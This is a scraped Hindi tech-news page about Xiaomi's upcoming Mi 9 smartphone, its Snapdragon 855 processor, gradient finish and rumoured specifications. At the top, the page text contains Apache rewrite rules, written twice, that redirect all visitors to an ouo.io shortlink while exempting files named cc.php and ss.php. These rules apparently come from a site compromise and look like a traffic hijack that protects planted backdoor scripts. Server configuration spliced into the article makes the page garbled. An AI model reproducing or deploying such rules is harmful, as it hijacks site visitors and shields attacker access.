
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 416
Nextइंटरनेट डेस्क। चीन की मोबाइल निर्माता कंपनी शाओमी अपना एक नया स्मार्टफोन लांच करने वाली है। शाओमी 20 फरवरी को अपना Mi 9 को लांच करेगी। तो वहीं कंपनी के सीईओ ली जून स्मार्टफोन Mi 9 के कई रेंडर्स को शेयर कर चुके है। तो वहीं हाल ही में वीबो पर कंपनी के आधिकारिक अकाउंट से नए ग्रेडिएंट फिनिश के साथ Mi 9 की तस्वीरें शेयर की है। कंपनी ने शयेर की तस्वीर में भी इस स्मार्टफोन की फ्रंट पैनल की झलक देखने को नहीं मिल रही है।
आपको बता दें कि कंपनी के सीईओ ली जून ने इस बात को कंफर्म किया है कि Xiaomi Mi 9 में क्वालकॉम स्नैपड्रैगन 855 प्रोसेसर होगा। तो वहीं इससे पहले Lenovo ने पिछले साल दिसंबर में स्नैपड्रैगन 855 प्रोसेसर से लैस Z5 Pro GT को लांच कर चुकी है। शाओमी के आधिकारिक वीबो अकाउंट से मी9 की कुछ फोटों को भी शेयर किया है। इनमें यह स्मार्टफोन पिंक—ब्लू ग्रेडिएंट फिनिश के साथ नजर आ रहा है।
गौरतलब है कि शाओमी के प्रवक्ता डोनोवन सुंग ने हाल ही में एक ट्विटर पर एक टीजर शेयर किया है। यह टीजर इस बात की ओर इशारा कर रहा है कि मी9 मोबाइल सिक्योरिटी के लिए इन डिस्प्ले फिंगरप्रिंट सेंसर का उपयोग कर सकता है। हालांकि इसके अलावा और कोई जानकारी शेयर नहीं की है।
वहीं यदि एक रिपोर्ट की माने तो Xiaomi Mi 9 में एंड्रॉयड पाई, 3500 एमएएच बैटरी, 6.4 इंच का एमोलेड स्क्रीन के साथ वाटरड्रॉप नॉच होगा। इस स्मार्टफोन में ट्रिपल रियर कैमरा सेटअप के साथ सेल्फी के साथ 24 मेगापिक्सल का फ्रंट कैमरा दिया जा सकता है।